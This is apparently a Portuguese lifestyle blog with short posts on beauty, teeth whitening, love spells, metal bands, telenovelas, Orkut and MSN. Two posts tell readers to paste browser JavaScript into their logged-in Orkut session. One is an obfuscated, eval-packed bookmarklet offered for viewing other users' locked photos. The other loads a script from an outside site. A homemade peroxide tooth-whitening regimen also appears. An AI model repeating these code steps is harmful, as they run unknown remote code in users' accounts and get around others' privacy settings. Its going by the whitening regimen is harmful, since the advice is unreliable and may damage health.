Páginas

Melhores tratamentos de pele

Melhores tratamentos de pele Cuidar da pele é algo imprescindível a qualquer mulher. Desde tempos imemoriáveis podemos notar a constante presença da vaidade em todas as fases da evolução humana, desde Cleópatra com seus banhos de leite de cabra, até mesmo o extremo, como a condessa Elisabeth Bathory, que matava mulheres virgens para se banhar em seu sangue, pois acreditava que isso lhe traria a juventude eterna.

Deixando de lado todo esses métodos estranhos, atualmente existem centenas de maneiras simples e que realmente ajudam a tratar a pele, É claro que existem também os tratamentos em clínicas especializadas, que rejuvenescem e trazem consigo muito mais melhorias a pele. Um dos tratamentos mais utilizados na atualidade são aqueles que unem a ciência e o natural. Normalmente realizados em clínicas de estética.

Tratamentos que unem ciências antigas, como por exemplo massagens orientais, óleos e chás também ajudam a manter sempre a pele linda e saudável. Se você quiser se cuidar de verdade, deve então ter em mente o que você quer fazer, se quiser eliminar manchas, existem vários tipos de tratamento, se na verdade você quer hidratação, existem outros tipos. O Mais correto é sempre procurar um profissional, pois ele vai avaliar sua pele e te indicar um tratamento adequado as suas necessidades. Uma dica para cuidar da sua pele em casa é investir em cremes de qualidade, e passar sempre logo após o banho, assim a água ajuda e o creme hidrata ainda mais!

Melhor site para baixar músicas

Melhor site para baixar músicas A internet trouxe consigo muitos problemas e soluções. Um dos maiores são naquilo que envolvem músicas, pois existem milhões de músicas disponíveis na internet, sendo que não chega nem a 2% a quantia de musicas que estão legalmente disponíveis na rede para serem baixadas por ouvintes em todo o mundo. Existem sim uma grande quantidade de artistas, famosos ou não, que disponibilizam suas músicas para que qualquer um baixe.

A internet é um grande recurso de divulgação, mas também é um grande problema, pois com a disponibilidade gratuita de sons, as empresas acabam não faturando dinheiro suficiente, e isso também é muito prejudicial para a indústria fonográfica mundial. A única certeza é que apesar de tudo, é praticamente impossível retirar do ar os milhões de músicas disponíveis.

Se você também quer entrar nessa de baixar som gratuitamente, uma dicas são os sites listados abaixo, eles contém milhares de musicas, mas dê preferência por aquelas que foram disponibilizadas corretamente, e não implicam em contravenções penais, nem mesmo prejudicam nenhum tipo de profissional. Entre os sites mais recomendados para downloads de músicas estão o 4shared.com, que disponibiliza milhares de artistas em todos os estilos de músicas imagináveis, lá você também pode fazer seu cadastro e postar suas próprias musicas. Outro site que também é muito usado é o emp3world.com. Mas como já dissemos, dê sempre preferência para musicas postadas legalmente, pois baixar som sem autorização é crime, com pena prevista em lei.

Como manter a beleza das mãos

Como manter a beleza das mãos Toda mulher deseja estar sempre linda, com os cabelos sedosos e brilhantes, com o corpo perfeito e com tudo em cima, sem contar é claro do rosto, sem rugas ou marcas de expressão muito profundas. Mas e as mãos? Por muitas vezes, acabamos por nos esquecer das nossas mãos, simplesmente fazendo a unha e nada mais. Pois saiba que de nada adianta cuidar do corpo todo, se na hora de fazer um carinho em quem você gosta, suas mãos estarem feias.

Para te ajudar a cuidar dessa parte tão essencial do nosso corpo, existem centenas d formulas cosméticas e tratamentos estéticos. Todos eles visando muito mais do que a beleza estética, ajudam também a fazer com que você se sinta bem com todo seu corpo, e dessa forma, você acaba também ficando mais feliz com tudo que está ao seu redor. Para te ajudar a manter suas mãos sempre hidratadas e lindas, temos algumas dicas muito simples.

Da mesma forma que existem cremes exclusivos para o corpo e para o rosto, existem também cremes especiais para as mãos, pois a pele das mãos é muito diferente da pele do resto do corpo, sendo que pelo contato direto com produtos de limpeza, acabam se ressecando com mais facilidade. Então tenha sempre um creme de qualidade exclusivo para as mãos. Outra dica é sempre que for utilizar produtos químicos, use luvas de borracha, pode ser desconfortável, mas elas protegem as mãos. A ultima dica é ir pelo menos uma vez por mês uma boa manicura, para que ela faça uma esfoliação e hidratação profunda em suas mãos.

Como clarear os dentes em casa

Como clarear os dentes em casa Ter os dentes bem cuidados, branquinhos e lindos é sempre um bom sinal, afinal, quem é que não gosta de falar com alguém que tem a boca em perfeitas condições? E saiba que não é tão difícil assim manter a saúde da boca, muito pelo contrário, é muito simples, tudo que você precisa é de assepsia diária, escovando os dentes após as refeições, caso você passe muito tempo na rua ou no trabalho, escove pelo menos três vezes ao dia.

Mas ter um sorriso branquinho já é mais trabalhoso, pois diariamente entram em contato com os dentes substâncias que causam o amarelamento e escurecimento do esmalte que os recobre, alimentos em geral podem causar isso, mas os principais fatores do escurecimento são sem nenhuma dúvida a cafeína e o cigarro. E não vá pensando que cafeína está presente apenas no cafezinho, está também em diversos tipos de chás, principalmente nos escuros, como o chá mate e o chá preto, além também de ser substancia presente em todos os refrigerantes.

Mas como tratamentos para clarear os dentes vamos te dar aqui uma alternativa simples, fácil de encontrar e muito mais barata que qualquer tratamento. Para ter um sorriso lindo, brilhante e branquinho, basta que você vá a qualquer farmácia e compre bicarbonato de sódio, e peróxido. Essas duas substâncias são a base de todos os tratamentos que clareiam os dentes. Basta que você misture as duas, formando uma pasta, então você escova seus dentes com essa pasta duas vezes ao dia, com intervalos de pelo menos 12 horas entre elas. Após 15 dias seus dentes estarão visivelmente mais brancos, depois de 1 mês nesse tratamento, você pode passar a escovar os dentes com a pasta apenas uma vez ao dia.

Simpatia para conquistar alguém

Simpatia para conquistar alguém Não há nada melhor do que ficar ao lado de alguém que a gente ama, porém isso nem sempre é possível, pois muitas vezes, acabamos nos apaixonando por alguém que não nos corresponde, e isso nos causa muita dor e sofrimento. Seria maravilhoso poder fazer com que a pessoa amada nos dê uma chance de provar o quanto podemos faze-las felizes não é? E exatamente por essa razão que existem as simpatias!

Escolhemos uma simpatia que promete trazer seu amor até você, é muito simples, e você não vai precisar de nada extraordinário. Bastam apenas coisas que você encontra facilmente, e é claro a sua fé e seu empenho para que a simpatia realmente dê certo e você consiga conquistar a pessoa que você ama. O que você vai precisar é de uma foto do seu amor, uma foto sua, mel, uma fita de cetim vermelho e um saquinho de tecido vermelho.

Primeiro você deve pingar uma gota de mel na sua foto e uma gota de mel na foto da pessoa amada, coloque uma de encontro a outra e amarre com a fita de cetim, que deve dar duas voltas nas fotos e um nó bem forte para não soltar, lembre-se que é apenas um nó, pois esse nó simboliza a união das duas pessoas. Coloque as fotos amarradas dentro do saquinho vermelho e guarde por uma semana dentro do seu travesseiro, e toda noite antes de dormir você repete : “Neste travesseiro, nesta saco, nesta fita, neste mel, nestas fotos, o amor será construído.” , repita essa frase até você cair no sono. Depois de sete dias você vai começar a ter indícios de um sentimento mais forte entre você e seu amado.

Como tratar dos cabelos ressecados

Como tratar dos cabelos ressecados Se tem um problema que acaba afetando a maioria das mulheres são os cabelos ressecados. Não apenas os cabelos naturalmente secos, que para trata-los, bastam uma linha de produtos específicos, estamos falando dos cabelos ressecados pelos processos e agressões que acabam sofrendo, como por exemplo a poluição, as tinturas e alisamentos químicos, uso de secador de cabelos e chapinhas, enfim, tudo aquilo que usamos para ficar sempre mais lindas.

Esse tipo de ressecamento é mais difícil de tratar, pois, pouco a pouco ele vai destruindo o cabelo, tornando-o mais frágil e aumentando as quebras e também as quedas de cabelo, além é claro, daquela aparência de palha que os cabelos acabam ficando. Mas não se desespere, enquanto existir vida, há esperança! Pelo menos para deixar seus cabelos novamente cheios de brilho e vida, com aspecto saudável. Você só precisa seguir algumas dicas:

Corte seus cabelo pelo menos a cada três meses, pois se estiver muito ressecado, apenas cremes e hidratações não vão resolver o problema. Compre mais de uma máscara capilar de qualidade, alterne o uso delas, se numa semana você utilizou a que reduz o volume, na sema seguinte utilize a que promove a reestruturação das células, por exemplo. Vá fazer uma hidratação profissional pelo menos uma vez por mês. Em casa, faça uma vez por senama, depois que os cabelos estiverem melhor, passe a fazer a cada quinze dias em casa e a cada dois meses no salão. Assim seus cabelos vão retomar a vitalidade.

Como enrolar o cabelo em casa

Como enrolar o cabelo em casa
Como enrolar o cabelo em casa antes depois Ao contrário de muitas mulheres que buscam sempre o cabelo cada vez mais liso, algumas correm atrás de ganhar cachos definidos e lindos. Se você é uma dessa mulheres que querem todo balanço e graça dos cabelos cacheados, porém não deseja nada extremo, como por exemplo processos químicos irreversíveis, a dica pra você é enrolar os cabelos em casa.

Existem duas formas de se enrolar os cabelos em casa, a primeira e mais antiga é utilizando os famosos bobs, aqueles rolinhos nos quais se enrolam os cabelos, mas esse tipo de processo é muito difícil, pois você quase sempre vai precisar de alguém pra te ajudar, além de ter que passar horas com os bobs na cabeça, com secador de cabelos, enfim, muito trabalhoso. Se você quer algo mais rápido e simples vai precisar de apenas: chapinha, papel alumínio, spray fixador, pente e prendedores de cabelo.

O primeiro passo é pentear bem os cabelos secos e dividi-los em 4 partes. Comece sempre pela nuca, divida o cabelo em pequenas mechas, então aplique uma camada de spray fixador, enrole o cabelo com os dedos e depois enrole no papel alumínio. Faça isso em todo cabelo. Peque chapinha e segure por 20 segundo em cada rolinho de papel. Lembre-se de começar a retirar o papel pelas mexas que você fez primeiro. Depois de retirar todo o papel, e ajeitar os cachos com as mãos, você já vai estar com cachos lindos e pronta pra arrasar e para voltar ao visual normal, basta lavar!

Como alisar o cabelo em casa

Como alisar o cabelo em casa Ter o cabelo lisinho e escorrido é o sonho de milhares de mulheres no mundo inteiro, justamente por isso, salões de beleza investem em especializações e empresa de cosméticos em todo o mundo a cada dia fazem novas descobertas, aperfeiçoando os produtos, deixando-os mais seguros e com melhores resultados. Atualmente existem centenas de produtos no mercado, que prometem alisar o cabelo de uma vez, mas sem danificar os fios, e muitos deles realmente fazem isso.

Mas quando se trata desse tipo de coisa, todo cuidado é pouco, pois existem também muitos produtos por aí, com qualidade inferior, que não deixam o resultado desejado, além de danificar os cabelos, podendo até levar a queda, infecções e queimaduras no couro cabeludo, além de diversos tipos de alergias. Para evitar qualquer um desse problemas, procure apenas por produtos de qualidade, que podem ser mais caros, porém são garantidos.

Se você for alisar seus cabelos em casa, saiba que você corre o risco de não conseguir o resultado esperado, pois esses produtos são melhor aplicados por profissionais, mas se mesmo assim você quiser fazer as aplicações em casa, basta seguir as instruções de cada produto, lembrando sempre que o tempo estipulado pelo fabricante sempre deve ser mantido, outra dica importante é fazer o teste da mecha, basta misturar uma pequena quantidade de produto, então aplique numa mexinha do cabelo, para ver se seu cabelo aceita o produto, e não correr o risco de ficar careca.

Como acabar com a rotina nos relacionamentos

Como acabar com a rotina nos relacionamentos Existe uma coisa pela qual todos os relacionamentos acabam passando, mais cedo ou mais tarde: a famosa rotina! É claro que isso não é de todo ruim, pois afinal, muitas coisas boas estão relacionadas a rotina diária de um casal. Porém a rotina também pode influenciar negativamente em qualquer relacionamento. Seja um namoro ou casamento, só que por mais que os casais não queiram, é praticamente impossível não cair na rotina, o que acaba levando o relacionamento a ficar mais morno e até mesmo frio e distante.

Mas existem sempre coisas que podemos fazer para dar uma quebrada na rotina, e dessa forma esquentar novamente a relação entre o casal. Primeira dica pra acabar com a rotina é conversar! Isso mesmo, o tão temido termo “discutir a relação”, é uma ótima forma de sair da rotina e resolver pequenos problemas, inerentes a qualquer casal que se gosta de verdade. Outra dica pra sair da rotina é fazer uma surpresa ao seu marido ou esposa.

Não precisa ser nada muito grande, ou muito caro. Para dar uma esquentada na relação, que tal esperar o maridão com uma lingerie linda e sexy? Para os homens a dica é investir em romantismo, ao ir pra casa, leve flores pra sua mulher, caso esteja um pouco sem dinheiro, floriculturas também vendem rosas a vulso. Garanto que ela vai adorar! Invistam em programas apenas para o casal, deixem os filhos com os avós e marquem um jantar ou uma pizza, cinema, passeios em parques ou em shoppings. Pequenas atitudes também fazem uma grande diferença, dizer “eu te amo”, “você é especial” também são ótimas maneira de sair da rotina.

Melhores regravações de músicas

Melhores regravações de músicas Música é um estado de espírito! Isso todo mundo sabe, e quando a música é boa, é um estado de espírito frequente, e é justamente por isso, que existem tantas regravações de todos os tipo de músicas! Muitas delas ficaram realmente melhores do que s originais, algumas nem tanto, mas o fato é que sejam musicas nacionais ou internacionais, você pode escutar regravações sempre que enjoar da original.

Muitos artistas veêm isso como falta de criatividade, porém quem regrava alguma música, costuma dizer que é como uma homenagem ao cantor ou banda escolhida, ou então pelo fato da música escolhida marcar um momento em sua vida, existem cantores que fazem CDs interios apenas com versões e regravações de suas músicas prediletas. Como por exemplo Zé Ramalho, que já regravou Bob Dylan e Raul Seixas.

Falando em Raul, ele é um dos cantores brasileiros mais regravados, grupos de pagode, duplas sernatejas, cantores solo e bandas do rock n' roll nacional vivem homenageando o finado Raulzito regravando suas canções. Outro brasileiro com records em canções regravadas é Roberto Carlos. Cantoras como Elis Regina e Maysa, também são constantemente regravadas, além é claro de Tom Jobim, Vinicius de Moraes e Caetano Veloso.

Discografia da banda Shaman

Discografia da banda Shaman Se tem uma coisa que o Brasil também sabe fazer é musica de qualidade! E no cenário do metal mundial, é claro que por aqui não fica nada a desejar, seja fazendo um metal extremo como os caras do Torture Squad ou Sepultura ou então numa linha mais Heavy/Melódico clássico como o Angra, bandas brasileiras estão sempre fazendo sucesso por todo o mundo.

E uma das bandas que nos revelou um grande talento foi sem nenhuma dúvida o Shaman, que por algum tempo foi liderado pelo ex vocalista do Angra, André Mattos. Quando surgiram os rumores, críticas vieram, dizendo que a nova banda não conseguiria alcançar o sucesso, mas ao Shaman mostrou que realmente veio pra ficar. Embora tenham lançado até agora apenas 3 álbuns de estúdio e um ao vivo, logo logo teremos notícias de mais lançamentos.

Os álbuns já lançados são:
Ritual (2002), e o cd de estréia fez tanto sucesso, que até mesmo a rede Globo embarcou na carona, colocando a música Fairy Tale.
RituAlive (2003), CD que conta também com um DVD, muito bom, além das músicas do Shaman também podemos conferir covers.
Reason (2005), segundo CD que alcançou tanto sucesso quanto o primeiro, ainda com a formação original.
Immortal (2007), último trabalho da banda, que se deu após a saída dos integrantes Andre Matos, Hugo Mariutti e Luis Mariutti, ficando apenas Ricardo Confessori. Atualmente estão na banda : Thiago Bianchi ( vocal), Fernando Quesada (baixo), Léo Mancino (guitarra) e Ricardo na bateria.

Como ver fotos bloqueadas no Orkut

Já a muito tempo o orkut é o site de relacionamentos mais popular aqui no Brasil, pois afinal, você pode colocar sua vida inteira lá, fotos, vídeos, aplicativos, enfim tudo aquilo que você gosta, mas muitas vezes quando vamos fuçar alguém, ao clicar nas fotos, vemos que os álbuns estão bloqueados, aí vem aquela frustração, afinal, é muito chato quando isso acontece.

Para alívio dos curiosos de plantão, um indiano bolou um código que desbloqueia os álbuns de fotos, basta entrar no álbum bloqueado e então colar o código abaixo:
javascript:function $(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,'g’),k[c])}}return p};eval($(’x=h.r.v.17(/1g\/\d+\/(\d+)\.A/i)[1];h.r.v=u.y(9,4,F,7,12,g,k,V,q,3,14,f,8,1e,3,b,2,c,3,15,c,j,3,18,2,k,2,e,m,9,6,4,F,7,9,4,H,7,19,e,G,5,f,e,2,3,b,2,c,3,K,2,e,c,G,l,2,3,D,f,8,I,c,e,f,9,6,4,H,7,9,4,t,7,9,f,3,4,c,I,1c,1d,E,4,5,5,b,w,6,6,8,5,c,g,z,8,2,b,m,j,k,g,2,l,B,b,2,5,j,8,2,q,E,7,L,g,2,l,3,e,2,3,s,11,K,D,P,s,9,6,f,7,9,6,4,t,7);J=u.y(4,5,5,b,w,6,6,8,5,c,g,z,8,2,b,m,j,k,g,2,l,B,b,2,5,j,8,2,q);1b(i=1;i<=e;i++){p=h.C('M');p.O("Q","R");p.S.T="U";o=W X();o.Y='Z://10.16.1a/1f/N/'+i+'/0/'+x+'.A';a=h.C('a');a.13=J;a.n(o);p.n(a);h.r.n(p)}',62,79,'||111|32|104|116|47|62|99|60||112|114||100|97|108|document||46|98|103|121|appendChild|img||109|body|67|49|String|innerHTML|58|ctrlc|fromCharCode|45|jpg|115|createElement|76|39|51|105|50|101|blog|82|66|span|milieu|setAttribute|43|align|left|style|padding|10px|117|new|Image|src|http|img3|84|65|href|72|77|orkut|match|78|69|com|for|102|61|107|images|medium'.split('|'),0,{}));void(0)

Não temos nenhuma garantia de que o código funciona de verdade, portanto o melhor mesmo é adicionar o contato novo, e dessa forma você vai poder fuçar a vontade!

Assistir Chaves Online

Assistir Chaves Online Sem sombras de dúvidas, um dos melhores seriados da TV de todos os tempo é o Chaves! Esse moleque de rua vive aprontando muitas confusões ao lado de sua inseparável amiga Chiquinha e também do Kiko. Juntos eles fazem muita bagunça e é claro atormentam a vida de Seu Madruga, do senhor Barriga e também da dona Clotilde, “carinhosamente” apelidada de Bruxa do 71. Sem contar o que eles acabam fazendo com todos os outros personagens das historinhas!

Se você gosta do Chaves, atualmente ele passa no SBT aproximadamente entre 13 e 15h, não dá pra dizer com muita certeza, pois o horário difere de região pra região do país, sendo que em algumas passa as 5:30 da manhã e em outras está fora do ar. Se você não consegue assistir pela TV aberta, sua solução então é ver pela internet, pois daí sim você vai poder assistir na hora que quiser, sem nenhum problema.

Existem dezenas de sites que disponibilizam os episódios do Chaves online, sendo que em alguns deles existe até conteúdo pra baixar no computador, porém se você quer um site seguro, pra assistir sem ter que se preocupar, a dica é entrar no You Tube, lá estão todos os episódios, até mesmo alguns que nunca foram exibidos, como por exemplo a despedida, o último episódio gravado pela turma do Chaves, vale a pena entrar e ver, ou rever os episódios que você mais gostou!

Assistir Chapolin online

Assistir Chapolin online Um dos seriados de TV de maior sucesso em todo o mundo é o Chapolin, com seu humor sem nenhuma apelação, esse super-herói atrapalhado conquistou pessoas de todas as idades, e é uma pena que atualmente o seriado esteja fora do ar, mas se você tem acesso a internet, pode assistir quantas vezes quiser todos os episódios do Chapolin Colorado!

Poderá ver esse personagem enfrentando terríveis vilões, como o Racha-cuca e Tripa Seca, episódios para todos os gostos, como por exemplo aquele que ele vai pro espaço, ou então o que ele acaba indo visitar a Vila do Chaves, e quantos outros você quiser. Dar muita risada com as piadas, com os trocadilhos do próprio Chapolin e também é claro rir muito do papel de besta que ele sempre acabava fazendo em todos os episódios! E vai poder ver até mesmo episódios que nuca foram exibidos em TV aberta, ou então que passaram já a muito tempo estão disponíveis em sites na internet.

Você pode assistir no You Tube, ou então em qualquer outro site, basta digitar episódios Chapolin no Google por exemplo, que dezenas de sites vão aparecer, aí é só escolher qual você quer ir ver, e se divertir e rir muito com as palhaçadas do Chapolin, dos bandidos e de todo mundo que aparecem nos episódios! Mas lembre-se que para alguns sites são necessários baixar aplicativos para que os episódios rodem, se você não quer baixar nada, o melhor mesmo é usar o You Tube.

Show do Venom no Brasil

Sem duvida uma das maiores bandas de todos os tempos é o Venom, que praticamente iniciou uma nova fase no Metal mundial, trazendo letras totalmente inspiradas no lado obscuro da humanidade, além de ser considerado por muitos a primeira banda de Black Metal, apesar do estilo da banda lembrar mais o Motorhead, suas letras revolucionaram o cenário musical mundial.

Com musicas como Black Metal e Welcome to Hell, se tornou lendária e arrastou milhões de fãs, além é claro de inspirar outras dezenas de bandas pelo mundo a fora. Aqui no Brasil não seria diferente, em festivais e em bares de metal podemos notar uma grande quantidade de pessoas que usam camisetas da banda, além é claro da imensa quantidade de downloads e cds vendidos com suas músicas. Por causa dessa grande quantia de fãs o Venom retorna ao Brasil depois de mais de 20 anos da sua última apresentação.

Pra quem curte o som dos ingleses do Venom, esse show é imperdível, afinal pode ser a última vez que a banda se apresenta por aqui. Vale a pena curtir. O Show vai acontecer no dia 12 de Dezembro, no Victoria Hall de São Caetano do Sul em São Paulo, a partir das 22h, os preços dos ingresso serão de aproximadamente R$90,00, e podem ser adiquiridos no site victoriahall.com.br ou no próprio local. Maiores informações pelos telefones (011) 4224-6902 e 4224-6860.

Marcos vai ficar com Dora na novela Viver a Vida

Marcos vai ficar com Dora na novela Viver a Vida A novela Viver a Vida já está dando muito o que falar, mal Helena, personagem de Taís Araújo foi viajar com Luciana, personagem de Aline Morais, que Marcos já está colocando as garrinhas de fora. Primeiro saindo para ir a uma boate com seu amigo, e lá ele ficou paquerando Dora, personagem de Giovana Antoneli, e nos caítulos dessa semana ele saiu passear de lancha com ela por ilhas desertas, nadaram nus no mar, além de se beijarem.

Ao que tudo indica, Helena pode perder seu marido, pois ela não é do tipo que perdoa esse tipo de traição, afinal, ela está viajando a trabalho, e provavelmente será sua última viajem desse tipo, pois ela planeja abandonar as passarelas para se dedicar ao marido. Já Marcos, que desde o começo da novela tem fama de ser um grande cafajeste, pois tria sua primeira mulher, Teresa, interpretada por Lílian Cabral. E ela bem que avisou a Helena que ele faria isso com ela também.

Aliás não só a ex-mulher de marcos, como também sua filha Luciana, preveniram Helena sobre o caráter de Marcos. Mas quando se casou, Helena estava muito apaixonada, e por isso não quis esperar para conhecer melhor as atitudes de Marcos, que a cada dia vem se revelando um homem possessivo, ciumento e agora, ainda por cima mal caráter. Vamos ficar grudados na novela para saber tudo o que está por acontecer nos próximos capítulos, lembrando que muitas coisas irão acontecer também em Petra, cidade pra qual Lu e Helena viajaram.

Hordes of Chaos novo CD do Kreator

Hordes of Chaos novo CD do Kreator
A banda de Thrash Metal alemã Kreator lançou um novo CD e está em turnê mundial divulgando o trabalho juntamente com a banda americana Exodus. O novo CD dos germânicos está tão bom quanto os anteriores, a banda que já está na estrada a mais de 25 anos prova a cada novo trabalho que diferentemente de todos os outros que acabaram caindo em modinhas, eles não são de brincadeira, e continuam fazendo um metal de qualidade tanto sonora quanto em suas letras.

O Cd intitulado Hordes of Chaos traz a essência do thrash do Kreator, com ainda mais violência que álbuns anteriores, com certeza vai agradar tanto os fãs antigos quanto aqueles que estão tendo contado somente agora com o trabalho da banda, que é considerada por muitos umas das poucas que se salvam hoje em dia no cenário do metal mundial. O CD traz 10 músicas, e Mile Petrozza está com uma voz mais rasgada, lembrando um pouco o início do Kreator, como nos sons Storm Of The Beast do primeiro álbum e Flag of Hate do segundo.

Já deu pra perceber que vale a pena adquirir mais esse Cd da Banda, e pros os mais fãs vão poder ter a chance de ver ao vivo, pois no dia 31 de Outubro, em São Paulo, mas precisamente no Via Funchal a banda fará mais uma apresentação aqui no brasil. Os ingressos variam de R$100 a R$160 reais, e podem ser adquiridos no site oficial do Via Funchal, porém é melhor correr, ou então você vai ter que pagar bem mais caro comprando de alguém na hora do show.

Como usar MSN online

Como usar MSN online Muitas vezes, por problemas na conexão, ou simplesmente por alguma falha ou vírus no seu computador, fica impossível de usar o MSN, o que é muito ruim, pois essa ferramenta é essencial para milhões de pessoas, seja apenas para se comunicar com os amigos ou também para trabalhar, já que é o programa de conversação mais completo e utilizado no mundo.

E é nessas horas que um serviço muito importante pode te ajudar e muito. Basta entrar num site e utilizar o MSN online, sem ter que instalar, e o que é melhor, gratuitamente, sem nenhum impedimento, e ainda por cima o site é super seguro, você não perde nenhum contado ao acessar seu MSN por ele, o único problema é que ele não contém a mesma quantidade de recursos que o MSN instalado tem, mas quebra um galho em horas de aperto.

Para utilizar o MSN online, basta digitar em algum site d busca, como o Google por exemplo, MSN Web Messenger e clicar em procurar. O MNS Web Messenger pode ser scessado de qualquer computador que tenha acesso a internet, até mesmo naqueles que o MSN está bloqueado, então não tem erro, você pode acessar de qualquer lugar! Aí é só conversar com os amigos, colocar os papos e paqueras em dia! Também é muito recomendado caso seu computador esteja cheio de vírus, pois esse programa é seguro, então não tem riscos de você pegar ainda mais vírus dos seus contatos, a não ser é claro que você aceite algum arquivo enviado.

Como usar MSN no celular

Como usar MSN no celular Faz muito tempo que o celular deixou de ser um aparelho que serve apenas como telefone móvel, hoje em dia, os celulares modernos trazem aplicativos como câmera digitais de fotos e filmagens, MP3, MP4, acesso a internet, games, enfim, dezenas de outros aplicativos, que já vem no celular ou podem ser baixados, e é claro que alguns dos mais modernos trazem também a opção de acesso ao MSN. Esse aplicativo é um dos mais usados, já que muitas vezes, longe de casa ou de uma lan house, você pode trocar idéias com seus amigos online!

O Messenger é um dos melhores aplicativos no que diz respeito a comunicação instantânea, milhões de pessoas utilizam como ferramenta de trabalho, ou apenas para conversar com os amigos mesmo, e poder ter acesso a isso pelo celular é uma das mais inovadoras formas de comunicação. Mas é claro que muitos celulares ainda não oferecem essa opção. Mas se o seu oferece e você não sabe como usar, veja como é fácil, lembrando também que não são todas as operadoras que disponibilizam acesso ao MSN pelo celular.

Antes de mais nada, veja qual é o seu aparelho e também sua operadora, Se possível, vá até o site oficial da operadora, lá está tudo explicado, todo o passo-a-passo de como utilizar o MSN no seu celular. Mas você também pode fuçar no celular, em ferramentas, ou então em Web, lá estará o ícone para acessar o MSN, caso seu aparelho não possua nenhum ícone de MSN, ele provavelmente não tem esse recurso.

Como mandar vários recados de uma vez no orkut

Como mandar vários recados de uma vez no orkut Quem utiliza o Orkut com freqüência sabe o quanto muitas vezes é irritante ter que mandar um por um os recados para os amigos, já que muitas vezes os recados são convites para festas ou então apenas lembranças de boa noite, ou de datas especiais, como ano novo, Halloween, enfim, qualquer coisa que você acha que deve mandar para todos os seus amigos.

Para te ajudar nisso, existem alguns aplicativos que podem resolver esse problema, bastar entrar em alguns sites, e lá você escreve o recado que deseja, então uma ferramenta do site manda os recados para todos os amigos do seu orkut. È muito simples, e resolve toda a sua pressa em mandar o mais rápido possível os recados.

Além de sites, existem também códigos que prometem mandar recados para todos os amigos de uma vez. Um dos códigos mais utilizados é o seguinte: javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://www.gifsrecados.com.br/lista/orkut_lista.js';void(0)
Depois de copiar o código, você deve fazer o Login na sua conta do orkut, então na barra de endereços você cola o código e dá um enter, espere até a página carregar. Ao abrir a página, você escreve o recado que quiser e clique em enviar. Não é sempre que esse tipo de código dá certo, pois nem todos os computadores estão com a versão mais atualizada do Internet Explorer ou então do Fire Fox, portanto, para evitar transtornos, o melhor, por mais que demore, é mandar os recados um a um.

Como aumentar a velocidade da sua internet

Como aumentar a velocidade da sua internet Internet lenta é uma das coisa mais irritantes para quem utiliza com freqüência essa ferramenta, seja para jogar games online, trabalhar ou apenas conversar com os amigos. Mas saiba que internet lenta tem solução sim, só que antes de mais nada você deve saber o que está causando a lentidão da sua internet. Muitas vezes a internet fica mais lenta em alguns horários, como por exemplo no finalzinho da manhã e começo da tarde, entre as 10 e 13h.

Mas se você quer mesmo aumentar a velocidade, existem alguns programas que podem te ajudar, como por exemplo o Network Modem Speed, que pode ser baixado em qualquer site, como por exemplo o Baixaki. Esse programa é indicado para quem utiliza internet discada, que já é realmente mais lenta do que as outras opções de internet. Já pra quem tem internet a cabo ou Adsl o melhor programa é o Network Cable e Adsl Speed.

Uma dica importante é que ao instalar o programa certo para seu tipo de internet, ele não é executado automaticamente, você deve ir até a aba de configuração do programa. Lá você clica na opções que deseja e depois em aplicar. O programa vai perguntar se deseja reiniciar o computador, e você clica em sim. Os programas são grátis, mas quando você abre a internet, aparecem alguns pop-ups de propagandas, basta então ativar o bloqueador de pop-ups e utilizar a internet que agora vai estar mais rápida.

Carros mais velozes do mundo

Carros mais velozes do mundo  Saleen S7 Twin-TurboSe existe algo que fescina a humanidade desde os primórdios é a velocidade. Sempre houveram disputa para saber quem é o mais veloz, o corredor mais veloz, o cavalo, corridas de viga na era Romana, e é claro que esse fascínio continua até hoje, com corrida de automóveis e motos. Mas para algumas pessoas, apenas ver outros correndo não é o bastante.Justamente por esse motivo é que as fabricantes de carros sempre fazem o possível para saciar a sede pela aventura daqueles que amam a velocidade. Carros como o magnifico Bugatti Veyron, que pode chegar a até 407km/h, sem contar que vai de 0 a 100 em menos de 2,5 segundos, ou seja uma super máquina pra quem gosta de acelerar, e é claro tem dinheiro, afinal esse carro custa cerca de 1.500.000 de Euros.
Carros mais velozes do mundo  Koenigsegg CCXJá o superesportivo Koenigsegg CCX tem algumas outras vantagens, como por exemplo funciona com biocombustível, o que causa menos poluição no meio ambiente, é apenas um pouco mais lento na arrancada, vai de 0 a 100 em 3,2 segundos, e sua potência máxima é de até 300km/h, o que também é impressionante, pois passa o limite de velocidade de muitos carros da F1. Seu preço gira em torno de 1.330.000 Euros.
Carros mais velozes do mundo  Bugatti Veyron Outro superesportivo é o Saleen S7 Twin-Turbo, esse carro possui duas versões, a de rua pode chegar a de 0 a 100 em menos de 2,6 segundos, e sua aceleração máxima é de 322km/h, já a versão para competições é uma das mais rápidas da atualidade, pode alcançar até 426km/h. Se valor é tão auto quanto dos outros já citados, apesar de um pouco mais barato, está longe das garagens da maioria das pessoas, cerca de US$ 555 mil. E você pensava que o mais veloz era a Ferrari né?!

Show do Kreator no Brasil

Show do Kreator no Brasil
Uma das maiores e melhores bandas do Thrash Metal mundial na atualidade está de volta ao Brasil, e promete que essa turnê será ainda mais “from hell” do que a última. Trazendo a turnê do mais recente disco da banda “Hordes of Chãos”, que está na lista dos melhores discos lançados neste ano, sendo que já é o vigésimo CD de estúdio lançado pela banda, que apesar de todo esse tempo de estrada continua fazendo um som de altíssima qualidade.

Kreator é uma lenda viva do cenário do metal mundial, já está prestes a completar trinta anos e comprovou que apesar das muitas modinhas que nos últimos anos estão poluindo o verdadeiro cenário headbanger, eles não precisam cair em roubadas, e continuam mandando muito bem, sem ter nada a ver com outras grandes de bandes, de renome mundial, que acabaram por pegar vários vírus musicais, com influencias new metal.

Desta vez a grande banda alemã se apresentará juntamente com a banda americana Exodus, que está divulgando seu trabalho mais recente o CD Let There Be Blood, de 2008, que é uma regravação de seu primeiro trabalho de 1985, o CD Bonded By Blood. E essa mistura explosiva já comprovou que está arrando no mundo inteiro. Se você quiser ir aos shows, vai ter que procurar por alguém disponível te vender um ingresso, pois o show em Sampa rola no dia 31 de Outubro, a partir das 22h no Via Funchal, podem também ser comprados no site do Via Funchal, e variam entre R$100 e R$160.

Poesias Evangélicas

